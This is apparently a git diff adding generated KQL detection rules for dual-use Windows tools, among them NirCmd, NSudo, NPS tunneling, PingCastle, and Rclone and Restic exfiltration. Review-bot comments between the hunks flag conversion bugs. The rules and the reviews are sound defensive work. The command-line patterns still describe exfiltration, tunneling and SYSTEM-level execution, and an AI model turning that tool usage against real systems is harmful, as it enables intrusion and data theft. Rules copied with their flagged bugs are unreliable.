+| where ((ProcessCommandLine contains " execmd " or ProcessCommandLine contains ".exe script " or ProcessCommandLine contains ".exe shexec " or ProcessCommandLine contains " runinteractive ") or (FolderPath endswith "\\NirCmd.exe" or ProcessVersionInfoOriginalFileName =~ "NirCmd.exe")) or ((ProcessCommandLine contains " exec " or ProcessCommandLine contains " exec2 ") and (ProcessCommandLine contains " show " or ProcessCommandLine contains " hide "))
\ No newline at end of file
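Review bot: The hash predicates in the nimgrab `| where` compare a full-length digest with `startswith` (`MD5 startswith "2DD44C3C29D667F5C0EF5F9D7C7FFB8B"`, `SHA256 startswith "F266609E…"`), which only behaves as an exact match while the column holds a single digest and reads as a prefix test to anyone tuning the rule; `MD5 =~ "2DD44C3C29D667F5C0EF5F9D7C7FFB8B"` and `SHA256 =~ "…"` state the intended equality directly. The same shape appears in the NPS, PingCastle, Process Hacker and System Informer hunks, so this is presumably how the converter maps Sigma hash selectors and is better fixed there than per generated file.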
diff --git a/KQL/rules/windows/process_creation/pua_nircmd_execution_as_local_system.kql b/KQL/rules/windows/process_creation/pua_nircmd_execution_as_local_system.kql
new file mode 100644
index 00000000..df76df83
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_nircmd_execution_as_local_system.kql
@@ -0,0 +1,12 @@
+// Title: PUA - NirCmd Execution As LOCAL SYSTEM
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-24
+// Level: high
+// Description: Detects the use of NirCmd tool for command execution as SYSTEM user
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+// False Positives:
+// - Legitimate use by administrators
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " runassystem "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_nmap_zenmap_execution.kql b/KQL/rules/windows/process_creation/pua_nmap_zenmap_execution.kql
new file mode 100644
index 00000000..f0fbeaa1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_nmap_zenmap_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Nmap/Zenmap Execution
+// Author: frack113
+// Date: 2021-12-10
+// Level: medium
+// Description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+// - Legitimate administrator activity
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\nmap.exe" or FolderPath endswith "\\zennmap.exe") or (ProcessVersionInfoOriginalFileName in~ ("nmap.exe", "zennmap.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_nps_tunneling_tool_execution.kql b/KQL/rules/windows/process_creation/pua_nps_tunneling_tool_execution.kql
new file mode 100644
index 00000000..c87421b7
--- /dev/null
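Review bot: The image check in the Nmap/Zenmap `| where` spells the binary `\\zennmap.exe` (and again in the `in~ ("nmap.exe", "zennmap.exe")` list), while the Zenmap GUI ships as `zenmap.exe`, so the Zenmap half of this rule cannot match a real process; the `Description` line has the matching `namp` typo. Both look inherited from the Sigma source rather than introduced by the converter, so the correction belongs upstream or in a post-conversion override rather than in this generated file: `FolderPath endswith "\\zenmap.exe"` and `in~ ("nmap.exe", "zenmap.exe")`.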
+++ b/KQL/rules/windows/process_creation/pua_nps_tunneling_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - NPS Tunneling Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-08
+// Level: high
+// Description: Detects the use of NPS, a port forwarding and intranet penetration proxy server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -server=" and ProcessCommandLine contains " -vkey=" and ProcessCommandLine contains " -password=") or ProcessCommandLine contains " -config=npc" or (MD5 startswith "AE8ACF66BFE3A44148964048B826D005" or SHA1 startswith "CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181" or SHA256 startswith "5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856") or FolderPath endswith "\\npc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_nsudo_execution.kql b/KQL/rules/windows/process_creation/pua_nsudo_execution.kql
new file mode 100644
index 00000000..4a6a6c26
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_nsudo_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - NSudo Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
+// Date: 2022-01-24
+// Level: high
+// Description: Detects the use of NSudo tool for command execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+// False Positives:
+// - Legitimate use by administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-U:S " or ProcessCommandLine contains "-U:T " or ProcessCommandLine contains "-U:E " or ProcessCommandLine contains "-P:E " or ProcessCommandLine contains "-M:S " or ProcessCommandLine contains "-M:H " or ProcessCommandLine contains "-U=S " or ProcessCommandLine contains "-U=T " or ProcessCommandLine contains "-U=E " or ProcessCommandLine contains "-P=E " or ProcessCommandLine contains "-M=S " or ProcessCommandLine contains "-M=H " or ProcessCommandLine contains "-ShowWindowMode:Hide") and ((FolderPath endswith "\\NSudo.exe" or FolderPath endswith "\\NSudoLC.exe" or FolderPath endswith "\\NSudoLG.exe") or (ProcessVersionInfoOriginalFileName in~ ("NSudo.exe", "NSudoLC.exe", "NSudoLG.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_pingcastle_execution.kql b/KQL/rules/windows/process_creation/pua_pingcastle_execution.kql
new file mode 100644
index 00000000..5f6dcfbb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_pingcastle_execution.kql
@@ -0,0 +1,10 @@ +// Title: PUA - PingCastle Execution +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2024-01-11 +// Level: medium +// Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level. +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1595 + +DeviceProcessEvents +| where ((MD5 startswith "f741f25ac909ee434e50812d436c73ff" or MD5 startswith "d40acbfc29ee24388262e3d8be16f622" or MD5 startswith "01bb2c16fadb992fa66228cd02d45c60" or MD5 startswith "9e1b18e62e42b5444fc55b51e640355b" or MD5 startswith "b7f8fe33ac471b074ca9e630ba0c7e79" or MD5 startswith "324579d717c9b9b8e71d0269d13f811f" or MD5 startswith "63257a1ddaf83cfa43fe24a3bc06c207" or MD5 startswith "049e85963826b059c9bac273bb9c82ab" or MD5 startswith "ecb98b7b4d4427eb8221381154ff4cb2" or MD5 startswith "faf87749ac790ec3a10dd069d10f9d63" or MD5 startswith "f296dba5d21ad18e6990b1992aea8f83" or MD5 startswith "93ba94355e794b6c6f98204cf39f7a11" or MD5 startswith "a258ef593ac63155523a461ecc73bdba" or MD5 startswith "97000eb5d1653f1140ee3f47186463c4" or MD5 startswith "95eb317fbbe14a82bd9fdf31c48b8d93" or MD5 startswith "32fe9f0d2630ac40ea29023920f20f49" or MD5 startswith "a05930dde939cfd02677fc18bb2b7df5" or MD5 startswith "124283924e86933ff9054a549d3a268b" or MD5 startswith "ceda6909b8573fdeb0351c6920225686" or MD5 startswith "60ce120040f2cd311c810ae6f6bbc182" or MD5 startswith "2f10cdc5b09100a260703a28eadd0ceb" or MD5 startswith "011d967028e797a4c16d547f7ba1463f" or MD5 startswith "2da9152c0970500c697c1c9b4a9e0360" or MD5 startswith "b5ba72034b8f44d431f55275bace9f8b" or MD5 startswith "d6ed9101df0f24e27ff92ddab42dacca" or MD5 startswith "3ed3cdb6d12aa1ac562ad185cdbf2d1d" or MD5 startswith "5e083cd0143ae95a6cb79b68c07ca573" or MD5 startswith "28caff93748cb84be70486e79f04c2df" or MD5 startswith "9d4f12c30f9b500f896efd1800e4dd11" or MD5 startswith "4586f7dd14271ad65a5fb696b393f4c0" or MD5 
startswith "86ba9dddbdf49215145b5bcd081d4011" or MD5 startswith "9dce0a481343874ef9a36c9a825ef991" or MD5 startswith "85890f62e231ad964b1fda7a674747ec" or MD5 startswith "599be548da6441d7fe3e9a1bb8cb0833" or MD5 startswith "9b0c7fd5763f66e9b8c7b457fce53f96" or MD5 startswith "32d45718164205aec3e98e0223717d1d" or MD5 startswith "6ff5f373ee7f794cd17db50704d00ddb" or MD5 startswith "88efbdf41f0650f8f58a3053b0ca0459" or MD5 startswith "ef915f61f861d1fb7cbde9afd2e7bd93" or MD5 startswith "781fa16511a595757154b4304d2dd350" or MD5 startswith "5018ec39be0e296f4fc8c8575bfa8486" or MD5 startswith "f4a84d6f1caf0875b50135423d04139f") or (SHA1 startswith "9c1431801fa6342ed68f047842b9a11778fc669b" or SHA1 startswith "c36c862f40dad78cb065197aad15fef690c262f2" or SHA1 startswith "bc8e23faea8b3c537f268b3e81d05b937012272d" or SHA1 startswith "12e0357658614ff60d480d1a6709be68a2e40c5f" or SHA1 startswith "18b33ab5719966393d424a3edbfa8dec225d98fa" or SHA1 startswith "f14c9633040897d375e3069fddc71e859f283778" or SHA1 startswith "08041b426c9f112ad2061bf3c8c718e34739d4fc" or SHA1 startswith "7be77c885d0c9a4af4cecc64d512987cf93ba937" or SHA1 startswith "72dbb719b05f89d9d2dbdf186714caf7639daa36" or SHA1 startswith "5b1498beb2cfb4d971e377801e7abce62c0e315b" or SHA1 startswith "292629c6ab33bddf123d26328025e2d157d9e8fc" or SHA1 startswith "be59e621e83a2d4c87b0e6c69a2d22f175408b11" or SHA1 startswith "0250ce9a716ab8cca1c70a9de4cbc49a51934995" or SHA1 startswith "607e1fa810c799735221a609af3bfc405728c02d" or SHA1 startswith "ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3" or SHA1 startswith "044cf5698a8e6b0aeba5acb56567f06366a9a70a" or SHA1 startswith "ef2dea8c736d49607832986c6c2d6fdd68ba6491" or SHA1 startswith "efffc2bfb8af2e3242233db9a7109b903fc3f178" or SHA1 startswith "5a05d4320de9afbc84de8469dd02b3a109efb2d4" or SHA1 startswith "a785d88cf8b862a420b9be793ee6a9616aa94c84" or SHA1 startswith "5688d56cbaf0d934c4e37b112ba257e8fb63f4ea" or SHA1 startswith "5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17" or 
SHA1 startswith "81d67b3d70c4e855cb11a453cc32997517708362" or SHA1 startswith "9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad" or SHA1 startswith "09c6930d057f49c1c1e11cf9241fffc8c12df3a2" or SHA1 startswith "e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92" or SHA1 startswith "9e3c992415e390f9ada4d15c693b687f38a492d1" or SHA1 startswith "3f34a5ee303d37916584c888c4928e1c1164f92a" or SHA1 startswith "ea4c8c56a8f5c90a4c08366933e5fb2de611d0db" or SHA1 startswith "3150f14508ee4cae19cf09083499d1cda8426540" or SHA1 startswith "036ad9876fa552b1298c040e233d620ea44689c6" or SHA1 startswith "3a3c1dcb146bb4616904157344ce1a82cd173bf5" or SHA1 startswith "6230d6fca973fa26188dfbadede57afb4c15f75c" or SHA1 startswith "8f7b2a9b8842f339b1e33602b7f926ab65de1a4d" or SHA1 startswith "a586bb06b59a4736a47abff8423a54fe8e2c05c4" or SHA1 startswith "c82152cddf9e5df49094686531872ecd545976db" or SHA1 startswith "04c39ffc18533100aaa4f9c06baf2c719ac94a61" or SHA1 startswith "e082affa5cdb2d46452c6601a9e85acb8446b836" or SHA1 startswith "a075bfb6cf5c6451ce682197a87277c8bc188719" or SHA1 startswith "34c0c5839af1c92bce7562b91418443a2044c90d" or SHA1 startswith "74e10a9989e0ec8fe075537ac802bd3031ae7e08" or SHA1 startswith "3a515551814775df0ccbe09f219bc972eae45a10") or (SHA256 startswith "90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b" or SHA256 startswith "5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85" or SHA256 startswith "e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03" or SHA256 startswith "9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795" or SHA256 startswith "7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f" or SHA256 startswith "9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a" or SHA256 startswith "c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275" or SHA256 startswith "1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b" or SHA256 startswith 
"768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2" or SHA256 startswith "1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae" or SHA256 startswith "606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6" or SHA256 startswith "b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a" or SHA256 startswith "ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1" or SHA256 startswith "9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559" or SHA256 startswith "c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2" or SHA256 startswith "a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef" or SHA256 startswith "84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d" or SHA256 startswith "c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524" or SHA256 startswith "01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b" or SHA256 startswith "9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b" or SHA256 startswith "63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629" or SHA256 startswith "2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358" or SHA256 startswith "7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca" or SHA256 startswith "e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea" or SHA256 startswith "dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172" or SHA256 startswith "dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4" or SHA256 startswith "8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2" or SHA256 startswith "5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66" or SHA256 startswith "e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27" or SHA256 startswith "75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41" or SHA256 startswith 
"56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1" or SHA256 startswith "f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0" or SHA256 startswith "845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8" or SHA256 startswith "9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d" or SHA256 startswith "5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726" or SHA256 startswith "37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90" or SHA256 startswith "ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5" or SHA256 startswith "3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140" or SHA256 startswith "d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87" or SHA256 startswith "63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892" or SHA256 startswith "47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054" or SHA256 startswith "7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd")) or FolderPath endswith "\\PingCastle.exe" or ProcessVersionInfoOriginalFileName =~ "PingCastle.exe" or ProcessVersionInfoProductName =~ "Ping Castle" or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" 
or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_pingcastle_execution_from_potentially_suspicious_parent.kql b/KQL/rules/windows/process_creation/pua_pingcastle_execution_from_potentially_suspicious_parent.kql
new file mode 100644
index 00000000..5debb7c9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_pingcastle_execution_from_potentially_suspicious_parent.kql
@@ -0,0 +1,10 @@
+// Title: PUA - PingCastle Execution From Potentially Suspicious Parent
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2024-01-11
+// Level: high
+// Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1595
+
+DeviceProcessEvents
+| where ((InitiatingProcessCommandLine contains ".bat" or InitiatingProcessCommandLine contains ".chm" or InitiatingProcessCommandLine contains ".cmd" or InitiatingProcessCommandLine contains ".hta" or InitiatingProcessCommandLine contains ".htm" or InitiatingProcessCommandLine contains ".html" or InitiatingProcessCommandLine contains ".js" or InitiatingProcessCommandLine contains ".lnk" or InitiatingProcessCommandLine contains ".ps1" or InitiatingProcessCommandLine contains ".vbe" or InitiatingProcessCommandLine contains ".vbs" or InitiatingProcessCommandLine contains ".wsf") or (InitiatingProcessCommandLine contains ":\\Perflogs\\" or InitiatingProcessCommandLine contains ":\\Temp\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\AppData\\Local\\Temp" or InitiatingProcessCommandLine contains "\\AppData\\Roaming\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or ((InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\"))) and (InitiatingProcessCommandLine contains ".bat" or InitiatingProcessCommandLine contains ".chm" or InitiatingProcessCommandLine
contains ".cmd" or InitiatingProcessCommandLine contains ".hta" or InitiatingProcessCommandLine contains ".htm" or InitiatingProcessCommandLine contains ".html" or InitiatingProcessCommandLine contains ".js" or InitiatingProcessCommandLine contains ".lnk" or InitiatingProcessCommandLine contains ".ps1" or InitiatingProcessCommandLine contains ".vbe" or InitiatingProcessCommandLine contains ".vbs" or InitiatingProcessCommandLine contains ".wsf") and (FolderPath endswith "\\PingCastle.exe" or ProcessVersionInfoOriginalFileName =~ "PingCastle.exe" or ProcessVersionInfoProductName =~ "Ping Castle" or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_potential_pe_metadata_tamper_using_rcedit.kql b/KQL/rules/windows/process_creation/pua_potential_pe_metadata_tamper_using_rcedit.kql
new file mode 100644
index 00000000..150e4d9e
--- /dev/null
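Review bot: In the `| where` of the pua_pingcastle_execution_from_potentially_suspicious_parent hunk, the InitiatingProcessCommandLine extension list (`.bat` … `.wsf`) is ANDed a second time after the outer OR group, so `((ext or paths or favourites) and ext and pingcastle)` collapses to `ext and pingcastle` and the `:\\Temp\\`, `\\AppData\\…` and `\\Favorites\\` branches never contribute on their own. If the Sigma condition was `1 of selection_parent_*`, the converter has narrowed the rule and the duplicated extension clause should be dropped; if the AND is intended, the path branches are dead and should go instead, so the generated file should be checked against the source rule either way. With the whole query on one physical line this is hard to see in a diff; emitting one predicate group per line from the converter would make such regressions reviewable.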
+++ b/KQL/rules/windows/process_creation/pua_potential_pe_metadata_tamper_using_rcedit.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Potential PE Metadata Tamper Using Rcedit
+// Author: Micah Babinski
+// Date: 2022-12-11
+// Level: medium
+// Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003, attack.t1036, attack.t1027.005, attack.t1027
+// False Positives:
+// - Legitimate use of the tool by administrators or users to update metadata of a binary
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "OriginalFileName" or ProcessCommandLine contains "CompanyName" or ProcessCommandLine contains "FileDescription" or ProcessCommandLine contains "ProductName" or ProcessCommandLine contains "ProductVersion" or ProcessCommandLine contains "LegalCopyright") and ProcessCommandLine contains "--set-" and ((FolderPath endswith "\\rcedit-x64.exe" or FolderPath endswith "\\rcedit-x86.exe") or ProcessVersionInfoFileDescription =~ "Edit resources of exe" or ProcessVersionInfoProductName =~ "rcedit")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_process_hacker_execution.kql b/KQL/rules/windows/process_creation/pua_process_hacker_execution.kql
new file mode 100644
index 00000000..19b74866
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_process_hacker_execution.kql
@@ -0,0 +1,14 @@
+// Title: PUA - Process Hacker Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-10
+// Level: medium
+// Description: Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc).
+// Process Hacker is a tool to view and manipulate processes, kernel options and other low level options.
+// Threat actors abused older vulnerable versions to manipulate system processes.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.discovery, attack.persistence, attack.privilege-escalation, attack.t1622, attack.t1564, attack.t1543
+// False Positives:
+// - While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis
+
+DeviceProcessEvents
+| where FolderPath contains "\\ProcessHacker_" or FolderPath endswith "\\ProcessHacker.exe" or (ProcessVersionInfoOriginalFileName in~ ("ProcessHacker.exe", "Process Hacker")) or ProcessVersionInfoFileDescription =~ "Process Hacker" or ProcessVersionInfoProductName =~ "Process Hacker" or ((MD5 startswith "68F9B52895F4D34E74112F3129B3B00D" or MD5 startswith "B365AF317AE730A67C936F21432B9C71") or (SHA1 startswith "A0BDFAC3CE1880B32FF9B696458327CE352E3B1D" or SHA1 startswith "C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E") or (SHA256 startswith "D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F" or SHA256 startswith "BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_radmin_viewer_utility_execution.kql b/KQL/rules/windows/process_creation/pua_radmin_viewer_utility_execution.kql
new file mode 100644
index 00000000..4f9233c4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_radmin_viewer_utility_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - Radmin Viewer Utility Execution
+// Author: frack113
+// Date: 2022-01-22
+// Level: medium
+// Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1072
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "Radmin Viewer" or ProcessVersionInfoProductName =~ "Radmin Viewer" or ProcessVersionInfoOriginalFileName =~ "Radmin.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_rclone_execution.kql b/KQL/rules/windows/process_creation/pua_rclone_execution.kql
new file mode 100644
index 00000000..4ed26d96
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_rclone_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - Rclone Execution
+// Author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group
+// Date: 2021-05-10
+// Level: high
+// Description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--config " and ProcessCommandLine contains "--no-check-certificate " and ProcessCommandLine contains " copy ") or ((ProcessCommandLine contains "pass" or ProcessCommandLine contains "user" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "sync" or ProcessCommandLine contains "config" or ProcessCommandLine contains "lsd" or ProcessCommandLine contains "remote" or ProcessCommandLine contains "ls" or ProcessCommandLine contains "mega" or ProcessCommandLine contains "pcloud" or ProcessCommandLine contains "ftp" or ProcessCommandLine contains "ignore-existing" or ProcessCommandLine contains "auto-confirm" or ProcessCommandLine contains "transfers" or ProcessCommandLine contains "multi-thread-streams" or ProcessCommandLine contains "no-check-certificate ") and (FolderPath endswith "\\rclone.exe" or ProcessVersionInfoFileDescription =~ "Rsync for cloud storage"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_restic_backup_tool_execution.kql b/KQL/rules/windows/process_creation/pua_restic_backup_tool_execution.kql
new file mode 100644
index 00000000..5dcd00a2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_restic_backup_tool_execution.kql
@@ -0,0 +1,14 @@
+// Title: PUA - Restic Backup Tool Execution
+// Author: Nounou Mbeiri, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-17
+// Level: high
+// Description: Detects the execution of the Restic backup tool, which can be used for data exfiltration.
+// Threat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, including cloud services.
+// If not legitimately used in the enterprise environment, its presence may indicate malicious activity.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048, attack.t1567.002
+// False Positives:
+// - Legitimate use of Restic for backup purposes within the organization.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "sftp:" or ProcessCommandLine contains "rest:http" or ProcessCommandLine contains "s3:s3." or ProcessCommandLine contains "s3.http" or ProcessCommandLine contains "azure:" or ProcessCommandLine contains " gs:" or ProcessCommandLine contains "rclone:" or ProcessCommandLine contains "swift:" or ProcessCommandLine contains " b2:") and (ProcessCommandLine contains " init " and ProcessCommandLine contains " -r ")) or ((ProcessCommandLine contains "--password-file" and ProcessCommandLine contains "init" and ProcessCommandLine contains " -r ") or (ProcessCommandLine contains "--use-fs-snapshot" and ProcessCommandLine contains "backup" and ProcessCommandLine contains " -r "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_runxcmd_execution.kql b/KQL/rules/windows/process_creation/pua_runxcmd_execution.kql
new file mode 100644
index 00000000..945ac7af
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_runxcmd_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - RunXCmd Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-24
+// Level: high
+// Description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+// False Positives:
+// - Legitimate use by administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /account=system " or ProcessCommandLine contains " /account=ti ") and ProcessCommandLine contains "/exec="
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_seatbelt_execution.kql b/KQL/rules/windows/process_creation/pua_seatbelt_execution.kql
new file mode 100644
index 00000000..82d72f38
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_seatbelt_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Seatbelt Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-18
+// Level: high
+// Description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1526, attack.t1087, attack.t1083
